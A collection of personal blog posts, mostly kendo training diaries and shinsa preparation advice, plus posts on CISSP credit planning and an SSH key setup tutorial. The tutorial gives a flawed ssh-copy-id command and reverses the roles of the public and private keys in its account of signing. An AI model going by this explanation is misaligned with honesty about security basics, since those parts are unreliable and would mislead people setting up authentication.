Ahhh, life :) I've just gone over the last weeks worth of blogposts from when I was still in college, working on getting my teaching degree. On the one hand I love reading about that time, on the other it makes me a bit sad because it's all done and gone. There's that 'mono no aware' again: the beauty of passing/fading. One thing that has never left me though, is the fact that I love to teach. 

That's why I was thrilled when Ton-sensei asked me to teach the beginners group for a part of class. :)

After warming up and doing footwork practice (laps of okuri ashi, lunges and fumikomi), my sempai suited up for kihon and waza practice (suriage-men, ai-men etc) and I took the group of a dozen newbies. Because I hadn't prepared anything beforehand and because Ton-sensei didn't have any specifics he wanted me to teach, I went through the following thought process.

Putting all of that together, I decided to work on ki-ken-tai-ichi: the unity of mind, sword and body during a strike. This builds upon what we've done so far and is something that the group could use in kihon practice with Jeroen. These are the drills I went through with them:

In each of these practices, I first let the group do them a number of times without me saying anything. Five men strikes, twenty haya-suburi, two laps of okuri-ashi, etc. I only observed them, trying to see what everyone is doing. After the initial round, I would provide general feedback without singling anyone out. Then I'd let them repeat the exercise again, doubling the amount of strikes/laps. During this second round I would provide the students with personal feedback.

I'm very glad that the group paid full attention! At no point in time did they start drifting away or were they slacking off which, I hope, was caused by my demeanor and posture: stern and polite, speaking clearly and loudly and giving precise instructions. Once again my strong lungs came in handy, as I was able to address the group as they lined up (no huddle needed) and still being heard over the loud group in bogu

I certainly hope to teach again sometime soon :)


kilala.nl tags: , , ,

View or add comments (curr. 2)

ITILv3: bone dry material

2013-01-13 20:31:00

Dry dry dry

*cough**hack* Someone get me a glass of water! 

After getting some quick credits out of the way for my CISSP certification, I'm now moving on to ITILv3 Foundations, all according to plan. But boy, oh boy, is that some dry reading material! When I first took my ITILv2 exam in 2001, it took some slugging and then I made the certification in one go. So technically you would expect me to get through this renewal easily. Well, I'm working through this particular book and it's drrryyyyyyyyaaaaihhh. A veritable deluge... no, that implies "wet"... A veritable landslide of management terms and words, rammed into short definitions, makes for something I have trouble getting through. 

Maybe I'd better get another book :)

Pictures not mine, sources A and B.


kilala.nl tags: , , ,

View or add comments (curr. 0)

Coaching: better than I expected

2013-01-12 13:45:00

Quite a while ago my dear friend Menno started a career in personal coaching. He's still a civil engineer, but as a side business he runs Rockover Coaching which is based on the co-active coaching formula. It took a lot of hard work, but he's now ready to start working with clients. As part of his startup year, he asked me whether I'd like to be a 'victim' and I gladly accepted. I may have an ingrained mistrust of coaches, but I know I can trust the guy who's been my best friend for 27 years ;)

Over the past few weeks we've used a lot of different techniques to explore various topics, such as:

So... After almost three months of weekly coaching I have to say it's a lot more fun and interesting than I thought before starting with Menno. I had a few other touch-feely courses (through work) before this, but none of those were as comfortable as this.


kilala.nl tags: , , ,

View or add comments (curr. 1)

Not much to say: it was good

2013-01-12 13:33:00

There's not much to say about today's training as it simply was a good, solid training. 

1.5 years ago I wrote about a kendo dummy that I would love to build. Lo and behold! Ton-sensei has built two for the dojo: one child-sized and one adult-sized. They look cool and after tweaking them a bit, many of our beginners were very happy to use them in training. 

After inspecting the dojo shinai I proceeded to go through kata #1-#4 with Hugo. Since he told me he was pretty rusty (he's often absent because of school) I took a firm lead and escorted him through the first three, correcting where needed. When we got to #4 I'm glad that Ton-sensei corrected a number of things I was doing wrong (most importantly, stab too high and at a wrong angle).

During footwork practice I was reminded yet again that I have trouble combinining okuri ashi with fumikomi: whenever I need to jump while going forward, I always overstep with the left foot before the jump. The timing is completely off: instead of jumping right after pulling the left leg in, my body tries to jump after the right foot has gone forward again. It's crappy.

Kihon and waza practice went pretty well, but it was jigeiko that stood out for me today :)


kilala.nl tags: , ,

View or add comments (curr. 0)

A great session in Amstelveen

2013-01-09 08:50:00

I'm not entirely sure what happened, but last sunday's Central Training did wonders for my confidence. Last night was the first time I can recall that I went to Amstelveen without feeling nervous. I was aching to practice with my sempai and I'd prepared to answer any questions I might get about what we learned during the CT.

I reckon that attending the CT was a good step in my continued 'exposure', trying to alleviate my anxiety issues. The CT was outside my comfort zone and because it went so well, it seems my boundaries have shifted a bit. Nice!

Class was started, as has become custom, with half an hour of kata training. I again partnered with Nienke and we did many repeats of kata #1 (and a bit of #2 and #3). Why focus so much on kata #1? Because of some contention we ran into! I'd been taught by Ton-sensei and Kris-fukushou that after being struck by shidachi (and after letting the bokken sink to eye level), uchidachi would be "pushed back" by shidachi. Shidachi would "threaten you away". Instead, Kiwa-sempai and Ran-sempai informed us that "uchidachi always moves first", so the new analogy would be that uchidachi attempts to flee, with shidachi preventing this by assuming a threatening pose. Interesting!

After kata a shinai check was performed, which has also become customary. I heard that last Saturday ~70% of the students' shinai were rejected during the check, leading to an impromptu lesson in maintenance. Hence Renshinjuku kendo dojo have instated the rule that, if your shinai is rejected, you will now spend the training repairing the big collection of dojo-shinai. Both of my shinai were in an "okay" state, though not very good. After tightening the tsuru of my second one, I was allowed to join class. So, time for another evening filled with maintenance!

After warming up, we moved to waza practice. A few rounds of kirikaeshi variations, followed by oki-men, oki-kote, hiki-waza from tsubazeriai and men-oji-waza. There wasn't any explanation of techniques, just the chance to practice a lot.

I had jigeiko with Onno-sempai, (I think) Tsuyuguchi-sensei and with Raoul-sempai.


kilala.nl tags: , ,

View or add comments (curr. 0)

Intensive kendo training: "central training"

2013-01-06 19:08:00

Almost a year ago I visited the Landstede sport center in Zwolle, to participate in the NK kyu-graded kendo. Today, we made the trek to attend the first 'central training' of the year. It's "central" insofar that it's a large kendo training, for all dojo in the Netherlands. Marli took my daughter for a fun-filled morning at Ballorig in Hattem, while Jeroen-sempai, Nienke and myself went to the training. Marli 'sacrificed' her usual day off, so I could have a great training day.

And great it was! Today's practice pulled in about 50 people (est. 15 beginners, 15 kyu-graded and 20 dan-graded), with four high-placed sensei and our honored chairman Odinot taking the lead. Today's agenda was as follows:

  1. 25 minutes of joint kihon practice of hayai-techniques. Also, ki-ken-tai-ichi exercises.
  2. 80 minutes of waza practice under Vitalis-sensei, while Wouters-sempai instructed the beginners.
  3. 20 minutes break/lunch.
  4. 60 minutes of jigeiko.

Under Vitalis-sensei, the group was split into mudansha and kodansha so everyone got from practice what they needed. We practiced the following techniques, some of which were new for many of us. Each technique was practiced 2x2 times, after which shugou was called in order to learn the next one. 

 

I got a chance to have jigeiko with three of the leading sensei

  1. I didn't receive any specific feedback from Barbier-sensei. I tried to use a few of the techniques we learned, combined with some of the stuff Heeren-sensei taught us. After a few minutes, Barbier-sensei asked me to do a round of kirikaeshi.
  2. I very much enjoyed my round with Castelli-sensei, who has a very enthousiastic and energizing personality. She let me try a few techniques, then took me aside to tell me (paraphrased): "You need to want your target. I see you hitting air, making a lot of movement, but never getting to where you want to go. I see you go for men, but you don't get to my men. I see you go for kote, then don't hit kote. You need to WANT to hit. You need to WANT to put your shinai on my head! Be hungry! You need to be like an animal of prey". And yeah, that was a very interesting realization for me! I hadn't thought of it like that, but she's right! The next few attacks I was a lot more focused, after which she took me aside again. "The Japanese say: ichi gan, the eyes are first. I see you very often not looking at your target. You strike my kote, but look somewhere completely else! Don't! Eyes on the target!".
  3. Right before the closing kirikaeshi, I had a very short round with Vitalis-sensei. At first I had offered to cede my position to mrs De Jong who outranks me, but Vitalis-sensei said I shouldn't do that. "I don't care if they're 10th dan! In kendo you need to be hungry and egotistical to get the training you want. You need to be fast in dressing, first in line and scramble for practice with the teachers you want!" Based on the few strikes I made for him, he also warned me that right now I shouldn't yet be trying "patient"/"waiting" kendo. "Make attacks! Make plenty of attacks! Right now you still have plenty of time to make plenty of mistakes. If two out of ten strikes land relatively close, that's great!" Which certainly sounds a lot like what Kris-fukushou keeps telling me: I wait too much.

During closing, Vitalis-sensei shared the following remarks.

After the training we quickly visited Kaijuu and Natalie and then headed home. Nienke and Jeroen were dropped off at the station again, after which the three of us went for dinner at Tang Dynastie. Great food, as always. All of us exhausted, our kid quickly fell asleep at 1900 and now it's off to bed for us as well :)


kilala.nl tags: , ,

View or add comments (curr. 0)

Well, that wasn't good

2013-01-05 15:02:00

Wow, I can tell that I haven't done any kendo the past three weeks :(

Today's practice went pretty badly for me, because I'm -already- out of shape! Three weeks of no sports is killer, after a few months of only two kendo practices each week. I really need that third session at home to keep up. I'm sad to say I had to bow out from the bogu-group twenty minutes before the end of class.

I got some very important feedback from Ton-sensei: my hayai-men is still almost as bad as a year ago. I still make the same damn mistakes as before, where I pull back large and only stretch forward when striking instead of stretching forward and then striking with a tiny movement. 1.5 years later I am still making the wrong movements. 

Also, whatever progress I had made with my breathing is now gone again. It was crap today and was the biggest cause of my early drop-out.

The second pointer I got from Ton-sensei is that I'm cueing my attacks. We already knew that, but I didn't know -this- particular cue! The Miyaharas and Zicarlo-sempai all told me about my footwork issues, right before launching an attack. But Ton-sensei also pointed out that I dip my shinai before swinging upwards. 

So, my training goals for this year: get a decent hayai-men, control my breathing, and less cueing before a strike.


kilala.nl tags: , ,

View or add comments (curr. 1)

Study plan for 2013: continued education

2012-12-21 06:03:00

Because I like to keep work and my private life very much separated, I usually try to do as little IT stuff at home as possible. "Work is work, home is home", I often say and so far it's made for a pleasant balance between the two where I don't take home too much stress. But, as much as I dislike it, being in the IT workforce means there is a very real need for continued education. So every once in a while I will do a huge burst of studying in one go, to achieve a specific goal or two. Case in point: 2010's CISSP certification.

However, said CISSP certification means that I will now need to start using a different approach in my continued education. I can no longer work with infrequent bursts, as I need to obtain a certain amount of CPE credits every year. Which is why I broke out the proverbial calculator and did some math to determine what I should do on an annual basis to retain my CISSP. Instead of huge bursts of work, I will now be spreading out my studies.

Which is why I made the following planning, for my 2012/2013 studies.

 

Again, with many thanks to my colleague Rob for making the final needed suggestion to get me to sort out the CPE calculation. And to my coach in being my sparring partner in all of this.

 


kilala.nl tags: , ,

View or add comments (curr. 0)

SSH keys for dummies: how to set up ssh_pk authentication

2012-12-20 21:18:00

How to set up SSH keys in three easy steps

Creating and configuring SSH key authentication can be a complicated matter. Ask any techie, including myself, about the process and you are likely to get a very longwinded and technical explanation. I will in fact provide that exhaustive story below, but here's the short version, where you set up SSH key authentication in three easy steps.

 

Quickly setting up SSH key authentication

Generate a new key pair using...

ssh-keygen -t rsa

...and just press Return on all questions.
Install the "lock" on your door using...

ssh-copy-id ~/.ssh/id_rsa.pub $host

...where $host is your target system. Or, if ssh-copy-id is not available, copy these instructions.
You're done! Start enjoying your SSH connection!

ssh $host

 

Please feel free to print the poster of this three-step approach, just to make sure you don't forget them.

 

What is SSH anyway?

SSH, short for Secure SHell, is an encrypted communications protocol used between two computers. Both the login process as well as the actual data interchange are fully encrypted, ensuring that prying eyes don't get to see anything you are working on. It also becomes a lot harder to steal a user account, because simply grabbing the password as it passes over the network becomes nigh impossible.

The name, secure shell, hides the true potential of the SSH protocol as it allows for many more functions. Among others, SSH offers a secure alternative to old-fashioned (and unencrypted) protocols such as Telnet and FTP. It offers:

SSH is cross-platform, insofar that both server and client software is available for many different operating systems. Traditionally it is used to connect from any OS to a Unix/Linux server, but SSH servers now also exist for Microsoft Windows and other platforms.

SSH is capable of using many different authentication and authorization methods, depending on both the version of SSH that is being used and on the various provisions made by the host OS (such as PAM on a Unix system). One is not tied to using usernames and passwords, with certificates, smartcards, "SSH keys" (what this whole page is about) and other options also being available.

Unfortunately, its flexibility and its many (configuration) options can make using SSH seem like a very daunting task.

 

What are SSH keys?

The default authentication method for SSH is the familiar pair of username and password. Upon initiating an SSH session you are asked to provide your username first, then your password, after which SSH will verify the combination against what the operating systems knows. If it's a match, you're allowed to login. If not, you're given another chance or so and ultimately disconnected from the system. However, the need to enter two values manually is a burden when trying to automate various processes. It often leads to hackneyed solutions where usernames and passwords are stored in plaintext configuration files, which really defeats the purpose of using such a secure protocol.

SSH keys provide an alternative method of authenticating yourself upon login. Taken literally, an SSH keypair are two ASCII files containing a long string of seemingly random characters and numbers. These keys are nearly impossible to fake and they only work in pairs; one does not work without the other. The reason why SSH key authentication works, is because what is encrypted using one key can only be decrypted using the other key. And vice versa. This is the principle behind what is known as public key cryptography.

Public key encryption, and thus SSH key authentication, is a horribly complex technical matter. I find that for most beginners it's best to use an analogy.

A keypair consists of two keys: the public and the private key. The public key could be said to be a lock that you install on an account/server, while the private key is the key to fit that lock. The key will fit no other lock in the world, and no other key will fit this particular lock.

Because of this, the private key must be closely guarded, protected at all cost. Only the true owner of the private key should have access to it. This private key file can be protected using a password of its own (to be entered whenever someone would like to use the key file), but it is often not. Unfortunately this means that, should someone get their hands on the private key file, the target account/host becomes forfeit. Thus it's better to use a password protected keyfile in combination with SSH-agent. But that's maybe a bit too advanced for now :)

The public key on the other hand can be freely copied and strewn about. It is only used to set up your access to an account/server, but not to actually provide it. The public key is used to authenticate your private key upon login: if the key fits the lock, you're in. "Losing" a public SSH key poses no security risk at all.

Of course there's one caveat: while losing a public key is not a problem, one should not simply add public keys onto any account! Doing so would enable access to this account/server for the accompanying private key. So you should only install public keys that have good reason for accessing a specific account.

 

How does SSH key authentication work?

So how does SSH key authentication work? It all relies on a public key infrastructure feature called "signing". The exact process of SSH key authentication is described in IETF RFC 4252, but the gist of it is as follows. 

  1. The destination system "signs" a test message with your public key
  2. The source system verifies that signature using your private key
  3. If the signature checks out, then we know that the pair of keys match. You're allowed to login.

As I said, this only works because the public and private key have an unbreakable and inimmitable bond.

All of the following text assumes that you already HAVE a ready-to-use SSH keypair. That's the first step in the three-step poster shown at the top of this page. Generating a keypair is done using the ssh-keygen command, which needs to be run as the account that will be using the keys. Basically: ssh-keygen -t dsa is all you need to run to generate the keypair. It will ask you for a passphrase (which can be left empty). 

 

What if you don't have ssh-copy-id?

Unfortunately ssh-copy-id is not included with every SSH client, especially not if you're coming from Window. Unfortunately, the instructions below will only work when your source host is a Unix/Linux system, so if you're using Windows as a source you will definitely need to use the manual process. The script below also assumes that the remote host is running OpenSSH.

Copy and paste the script below into a terminal window on your source host. It will ask you to enter your password on the remote host once.

==============================================================

echo "Which host do we need to install the public key on?"
read HOST
ssh -q $HOST "umask 077; mkdir -p ~/.ssh; echo "$(cat ~/.ssh/id_rsa.pub)" >> ~/.ssh/authorized_keys"

==============================================================

This could fail if the public key file is named differently. It could be id_dsa.pub instead, or something completely different if you are running a non-vanilla setup. 


Setting up SSH keys the hard way

So, finally the hardest part of it all: getting SSH keys to work, without the use of ssh-copy-id or any other handy-dandy tooling. 

First up, there is the nasty fact that not all SSH clients and daemons were created equal. There are different standards that they can adhere to when it comes to key file types as well as the locations thereof. Because Linux and open source software have become so widespread, OpenSSH has become very popular as both client and server. But you'll also see F-Secure, Putty, Comforte, and a whole wad of others out there. 

To find out which Unix SSH client you're running, type: ssh -V

For example:

$ ssh -V
ssh: F-Secure SSH 5.0.3 on powerpc-ibm-aix5.3.0.0


$ ssh -V
OpenSSH_4.3p2, OpenSSL 0.9.8j 07 Jan 2009

OpenSSH

F-Secure

Putty and WinSCP

When you are going to be communicating from one type of host to another (SSH2 vs OpenSSH), then you will need to perform key file conversion using the ssh-keygen command. The following assumes that you are running the command on an OpenSSH host.

Key points to remember

Always make sure you are clear:

File permissions


kilala.nl tags: , ,

View or add comments (curr. 1)

A class out of the ordinary

2012-12-19 15:33:00

 

Pfff... You would think that after nearly a year of training with my sempai in Amstelveen, I wouldn't be anxious anymore. But I am. :)

They're great people, but I always dread acting like a complete newbie around them. That and I fear that I'm not pulling my weight. Well, nothing to do but push on! Maybe this will be a nice subject for my next coaching session

Last night was a training out of the ordinary. Seeing how it was the last tuesday-night session for 2012, the turnup was smaller with only one sensei appearing and the group totaling out at roughly fifteen people (nine in bogu). While Roelof-sensei kept an eye on everyone for details, Kiwa-sempai led the advanced group in what I found to be a tremendously educational class. 

The first half hour of class was spent on practicing kendo kata. I finally got a chance to practice with Nienke, a classmate whom I appreciate and with whom I'm on-par. We went through kata #1 through #3 and focused greatly on practicing #3. A lot of things that I thought I was doing right, I turned out to be doing slightly wrong or I just learned them a bit differently. Under the watchful eye of Onno-sempai, Roelof-sensei and Kiwa-sempai I got a lot of pointers.

The next half hour was spent on learning the bokuto ni yoru kendo kihon waza keikoho, also known as the kihon bokuto waza. This set of exercises is relatively new and targeted mostly at beginning students and lower-ranked kendo. Here, one practices the various techniques in kendo in a more realistic as well as entry-level setting: unarmoured and with a bokuto, which is shorter than a shinai. Much more information can be read in this excelent PDF. In class we practiced kata #1 through #3, which are:

  1. The four basic targets: men, kote, dou and tsuki.
  2. A successive kote-men.
  3. The harai-men technique.

Despite seemingly being a lot easier than normal kata, I had a surprising amount of trouble getting the motodachi role right. And, as I have with the normal kata, at first I held back when striking at Nienke for fear of actually hitting her. In this regard, I overheard a very important comment from Kiwa-sempai who said to strike without power, but in a relaxed fashion. 

The last half hour was dedicated to jigeiko. The beginners' group joined Roelof-sensei for kihon practice, while the advanced group went through their desired routines. While most duos did actual sparring, I was very grateful for Zicarlo-sempai's help in practicing kirikaeshi. As expected I soon got winded, because I'm still messing up my breathing :) It was great practice though and I need a lot more of it, if I want to test for ikkyu this summer. 

The biggest failings I showed today were my over-use of my right hand which thus lead to hitting way too hard. Also, I was cueing, as Zicarlo said, because I kept fiddling with my footing. Every single time, before pushing off on the left foot, I would re-set my left foot one last time. This is in part due to my under-estimating the reach of my shinai: I keep fearing that I cannot reach my target.


kilala.nl tags: , ,

View or add comments (curr. 0)

Muscle ache? Check!

2012-12-16 08:57:00

kendo notes

Between my sterilization, the Dinosaurs show, standby duties and Alegria I've been absent from kendo class for two full weeks. And because I've been so busy with work I haven't practiced at home either. I feel guilty about it, but as they say: "god's punishment is swift" because boy do my muscles hurt! (;^_^)

It's great to see how our group keeps growing with newbies, who also show great attendance. Sadly, we don't seem to have much luck with the guys in bogu though. Sander is very busy with work, Hugo has a lot of schoolwork as do Jeroen, Martijn and Houdaifa and I myself have family and work stuff. So that's six guys who should be senior in the group, but who have problems making attendance. On the one hand it's beneficial to the friendly atmosphere in our dojo that Ton-sensei is so lenient about attendance, but on the other hand our attendance issues do keep both ourselves and our juniors from learning as quickly as we could. 

When it comes to our members, it's also interesting to see how many young kids we attract. We don't yet rival our mother-dojo in Amstelveen (who have flocks of Japanese children attending training on saturday), but I'm willing to bet that we're in the top four with the amount of kids. Bobby doesn't count anymore as she started high school this year, but between Aaron, Ainar, Nathan, Lukas and the Korean-boy-whose-name-I-havent-learned-yet we have five students of ten or younger.

Now, on to class. After warming-up we started with lunges in order to improve footwork and balance. I don't keel over anymore, but that's because I'm over-compensating. There are two commonly made mistakes: either you keep a too-narrow stance and can't keep your balance, or you over-compensate for that and take a too-wide stance (as per graphic A above). Kris-fukushou reminds us that we really should keep our feet at the proper width during the whole practice. 

We practiced kihon in the motodachi system, with the eight guys in bogu acting as partner for the dozen or so people without bogu. After that the group was split up as usual and my group moved on to waza practice. The two most important lessons for myself were about debana kote and suriage men

With debana kote I was always confused: do I need to move my shinai over or under my opponent's blade? Turns out that it's neither, because both are too slow :) As per graphic B, Kris explained that your shinai stays almost level, while the opponent moves in for a men-strike. That way you automatically duck under his shinai and you also stay close enough for a quick kote strike. 

Now, suriage men is apparently a very difficult technique for kyu-grade students, but it doesn't hurt to get introduced. Kris-fukushou suggested the D/C-shaped movement that is also mentioned by Salmon-sensei in the linked article. And as Salmon-sensei points out, most of us were having lots of issues with both the movements and the timing. In my case I feel way too slow and I have it in my mind suriage men is a two-stage movement, while it should be more of a single arc where you deflect and strike from the deflect position. 

Aside from these things, Kris-fukushou warned me about my kiai and kamae. I think it may tie in with a warning Onno-sempai gave me a few weeks ago. If I do my kiai incorrectly, I hunch and lock my arms. There's a big difference between a relexed posture and an "open" "YIAAAAAA!" yell and a tight/locked posture with a "closed" "RRUAAAGH!" yell. Once I'm locked up, I can't strike quickly nor properly. 

Class was closed with all student in bogu acting as motodachi in uchikomi geiko, which the other students had to run twice. That meant a total of fourteen rounds of five strikes for everyone. A great way to close this last class of the year!


kilala.nl tags: , ,

View or add comments (curr. 0)

Confessions of a CISSP slacker

2012-12-09 10:30:00

And to think... At the end of 2010 I was ecstatic about achieving CISSP status, after weeks of studying and after a huge exam. I loved the studying and the pressure and of course the fact that I managed to snag a prestigious certificate on my first attempt.

Well, the graphic on the left is a variation of my celebratory image of the time. I'm sad to say that I've been slacking off for the past two years, only doing the bare essentials to retain said title. Why? My colleague Rob had it spot on: "It seems like such a huge, daunting task to maintain your CPE." But in retrospect it turns out that he's also right insofar that "it really isn't that much work!".

Let's do some math, ISC2 style!

In order to maintain your CISSP title, you need to earn a total of 120 CPE in three years' time. As an additional requirement, you must earn 20C CPE every single year, meaning that you can't cram all 120 credits into one year. To confuse things a little, ISC2 refer to group A and group B CPE (which basically differentiates between security work and other work). 

Now, let's grab a few easily achieved tasks that can quickly earn at least the minimum required CPE.

That right there is 27 CPE per year, all in group A, which meets the required minimum. it's also 81 CPE out of the required 120 CPE for our three year term.

Of the 120 hours, a total of 40 can be achieved through group B, which involves studying other subjects besides IT security. In my case, the most obvious solution for this is self-study or class room education followed for Unix-related subjects. In the next few months I will be studying for my RHCSA certification (and possibly my SCSA re-certfication), which will easily get me the allowed 40 hours. 

That means I only need to achieve 120 - (81+40) = -1 more CPE through alternative ways :) Additional CPE can be achieved through podcasts, webcasts or by visiting trade shows and seminars. One awesomely easy and interesting way are ISC2 web seminars, which can be followed both realtime and on recordings.

Now, because I've been slacking off the past two years, I will need to be smart about my studies and the registration thereof. I'm putting together a planning to both maintain my CISSP and to prepare for my RHCSA. 

It's time to get serious. Again. ;)

EDIT:

It looks like it's a good idea to also renew my ITIL foundations certification. If I'm not mistaken, that can be counted towards group A of CPE, as ITIL is used in domains pertaining to life cycle management, to business continuity and to daily operations. I'll need to ask ISC2 to be sure.

Also, many thanks to Jeff Parker for writing a very useful article, pertaining specifically to my plight.


kilala.nl tags: , ,

View or add comments (curr. 1)

Slowly moving into a more senior role

2012-11-25 08:55:00

Yesterday was an interesting experience! As I remarked to Nick-sempai: "Whoa, I've never sat this far right in shoukai (詳解)!. What a different view!". Because Renshinjuku Almere is still a relatively new dojo, with a slow growth and retention rate, I'm already moving further towards the right of the shimoza (student seating). This is only in part due to my personal progress, but mostly due to the skewed balance between beginners and kendoka in bogu. While I am aware that I'm making good progress towards my first real grading I won't delude myself into thinking I'm getting good at kendo ;)

So what was so interesting about yesterday? That skewed balance and its results! For example, yesterday we had six guys in bogu (incl Ton-sensei) and twelve beginners in uniform or normal sports gear. That's why we ran class using the motodachi system, where groups of beginners line up to train with more advanced students. Yesterday's class forced myself and the others (none of whom have a dan grade) to think and act like proper seniors to the beginners. Instead of spending class training our own kendo, we paid proper attention to theirs while providing encouragement and corrections when needed. I enjoyed it a lot and it was a great learning experience!

After kihon practice in the motodachi rotation, the beginners went with Bob-sempai to train kirikaeshi and other basic techniques. The four of us spent another half hour doing jigeiko under the watchful eye of Ton-sensei. Because Nick-sempai was preparing for today's shinsa (exams), Ton wanted us all to focus on clean and basic kendo. Dou-strikes won't be needed and cleanly break from taiatari instead of trying hiki waza

Some pointers that I got:

Now, with regards to my own first grading I've heard a lot of different things. Originally my goal was to test in the winter of 2013, but I'm thinking of moving it forward to the summer of 2013. Some of my sempai will also be testing in the summer, so I'd love to join them.

In order to prep for the exams, I've made this shortlist of things that I must improve before the test.

  1. Kirikaeshi, coordination of hands and feet.
  2. Footwork, so no flat feet and no stepping through. 

All other things will slowly and gradually keep improving. But these two really require my attention. 


kilala.nl tags: , ,

View or add comments (curr. 0)

Handiwork: shinai repair and modification

2012-11-23 22:59:00

Shinai and suburi shinai

Tonight was well spent :)

I managed to fix a further three shinai using the spare parts Ton-sensei left me and that Bert-sensei donated. Two shinai of the dojo and one of my own are now in tip-top shape again. As a side project I took a bunch of broken or split take and created a suburi shinai for inside the house. At 85cm it's still a bit too long (a wrong swing will hit the ceiling), but at least it's usable :)

Also, at 85cm it's much too long to be used officially as a kodachi (regulation size is 62cm), but maybe it'll be usable for some practice anyway ( ^_^)


kilala.nl tags: , ,

View or add comments (curr. 0)

Studying kata under a different teacher

2012-11-20 18:36:00

Last tuesday was an interesting class in Amstelveen: in preparation for the shinsa (kendo exams) next sunday our students were studying kata. While we study kata on a weekly basis in Almere, in Amstelveen it's a much rarer occasion. 

I was asked by Bert Niezen-sempai to join him in practicing kata. While he's more experienced in kendo than I am, he indicated that he'd like my help in kata. We learned a lot, under the watchful eye of Ran-sempai who spent the better part of 45 minutes coaching us personally. During the practice I was always uchidachi ("attacking sword"), while Bert was shidachi ("receiving sword"). He had a lot of points for improvement, the following for me.

After kata practice we immediately went into 20 minutes of jigeiko (only preceeded by three rounds of kirikaeshi). I did three rounds where, sadly, I got progressively worse. My round against Zicarlo-sempai was pretty good and he helped me a lot! Against Onno-sempai I got worse insofar that I started shutting down. Finally, against Bertolino-sempai I excused myself because I noticed that I really wasn't acting properly. My head was mostly hazy and I was slow to react, or not even reacting at all. 

Learning points:


kilala.nl tags: , ,

View or add comments (curr. 0)

Studying kata

2012-11-17 22:06:00

The time has come to prepare for the 2012 NKR shinsa (kendo exams). As we already mentioned, the exam consists of four parts:

Many things have already been said about kirikaeshi and jitsugi, so let’s spend a little more time preparing for the kata exam!

Background

In his 2012 book “Kendo Coaching: tips and drills”, George McCall writes on the subject of kata:

If we look at the word KATA in Japanese, its usually rendered as å½¢. However, the actual proper usage is åž‹. Both read the same, but what’s the difference? The former simply means “shape” or “form.” It describes the form that something is in, what it looks like. The second kanji, on the other hand, is the thing that is used to create items of the same shape, in other words, a cookie cutter like device. 

Kendo-no-kata can therefore be thought of as a kendo shaped cookie cutter and the students who practice it cookies (hopefully kendo shaped). Although non-Japanese readers might not be interested in the difference, I think that one of the main purposes of kata study is revealed: i.e. kata training was/is traditionally thought of as one of the main vehicles to teach people correct kendo.

Kendo kata help us study proper posture, maai as well as seme. By practicing sword fighting in a simulated and choreographed fashion we can focus completely on the intricacies of our body, of our movements and of the connection with our opponent. We also learn to judge distance, which helps us in our kendo.

Also, while kendo is an abstraction of true sword fighting, the kendo kata approach “real” fighting closer. Both the techniques used, as well as our bokken help us understand the more serious side of our art which entails life or death situations. They’re no kenjutsu of course, but the kata are absolutely a useful tool in understanding and learning kendo.

Some suggest there is also a spiritual side to kendo kata. In Inoue-sensei’s “Kendo Kata: essence and application” it is said that kata #1 through #3 show the progression of a kenshi in his studies. While at first he will win a fight by outright killing his opponent, he will then move on to win by only dismembering. Finally the kenshi will grow so far that he does not have to strike at all, winning by pure seme(kata #3). The UK kendo foundation has some further reading on this subject.

Preparation

Students first learning about kendo kata are advised to first observe a number of videos. The web is rife with kata videos, so we’ve taken the time to choose a number of good ones.

First up, there is a series of classic AJKF training videos (in Japanese). They are a bit dated, but they go over each kata in exquisite detail by filming from various angles and by zooming in on important parts. They also show examples of what not to do. Below are the first four kata, the other videos can be found under the YouTube account that posted these videos.

Another excellent video was made by Kendo World at the 2012 keiko-kai. While it only shows each kata once or twice, the demonstration is still very impressive.

Advanced reading

Should you be inclined to deeply study each kata in written form, then we heartily recommend Stephen Quinlan’s “Nihon Kendo no Kata & Kihon Bokuto Waza”. In this excellent and thorough document (free PDF) mr Quinlan analyzes each kata, which is accompanied by many photographs.


kilala.nl tags: , ,

View or add comments (curr. 0)

Preparing for shinsa

2012-11-14 22:07:00

In less than two weeks time the NKR will host its semi-annual kendo grading exams, at the November centrally training. A number of our Renshinjuku students will take part in these examinations in order to test their current level. For many of them, this will be their first grading outside our own dojo, so we would like to take this opportunity to provide some information on the subject.

According to the NKR website, the requirements for kendo examinations are as follows:

The kata requirements differ per level. Ikkyu aspirants need to demonstrate kata#1through #3, shodan will show #1 through #5, nidan goes up to #7 and anything above nidan will display all ten kata. Aside from above requirements, there are also some formalities to clear, such as minimum age and a few payments.

For the purpose of this document I will limit myself to the ikkyu grading as I have no experience at all with the higher levels.

Before the grading, or shinsa, even begins there is the matter of proper presentation. If a shiai (tournament) would be compared to a business meeting, then a shinsa would compare to a gala: at the prior you are expected to dress and behave well, at the latter you are to act your very best! Apply proper personal care (nails clipped, hair properly kept, shaven if applicable) and make sure your equipment looks the part (proper maintenance, no loose ends, repairs where needed). Remove all dojo markings from your uniform and also remove your zekken. Make sure you wear your uniform and bogu neatly: no creases in the back, all himo at the same length, all himo lying flat, etc.

In kirikaeshi remember that it’s not a test of speed, but a test of skill. Show your best kirikaeshi by not rushing through it, but by paying attention to all details: footwork, timing, upswing through the center, downswing at an angle. Strike men at the proper angle and height. You are trying to strike ippon every time. As Heeren-sensei has pointed out repeatedly, your kirikaeshi should be performed in one kiaiand breath.

Fighting in jitsugi should not be compared go shiai kendo, but instead is more alike to the jigeiko we do in class: it is not a fight for points. Instead, it is a fight to show and test skill. Do not be preoccupied with scoring points and with defending against your opponent. Focus on ensuring that the both of you show your best and high quality kendo. Show a
connection between yourself and your opponent, show proper seme, show zanshinand show an understanding of your opponent’s actions.

The kata examination should show a similar connection with your opponent. Kataare not a simple choreography, kata are a study in forms of a proper sword fight. If possible, take it even more seriously than jitsugi or jigeiko as the bokken represents a real blade. Make sure that you have memorized the forms beforehand, then lock eyes with your kata partner and commence the “dialogue” that each exercise is.

In all of the above examinations kiai is key. I was once told that “in the early stages of kendo, >95% of kendo is kiai“. Whether that is really true is another thing, but the essence of the matter is that kiai is important. It regulates your breathing, it vocalizes your intent and assertiveness, it impresses your opponent and it is part of yuko datotsu. Without kiai there is no spirit, without spirit there is no kendo only stick fighting.

At this level, the gakka (written exam) focuses on basic knowledge of kendo. Terminology, equipment knowledge, basic concepts as well as rules and safety are topics you may expect to find on the test. In preparation ensure that you are familiar with most of the terms in our dojo’s lexiconThe AUSKF also has an excellent gakka study guide, listing some of the common topics that you can be questioned on, including suggestions on what to study.

If you have questions about the upcoming shinsa, please feel free to ask your teachers. If you feel that you need feedback on your kendo in the next few weeks, please indicate this to your teacher.


kilala.nl tags: , ,

View or add comments (curr. 0)

Finally a chance to test my backups

2012-11-13 21:46:00

Restoring from Time Machine

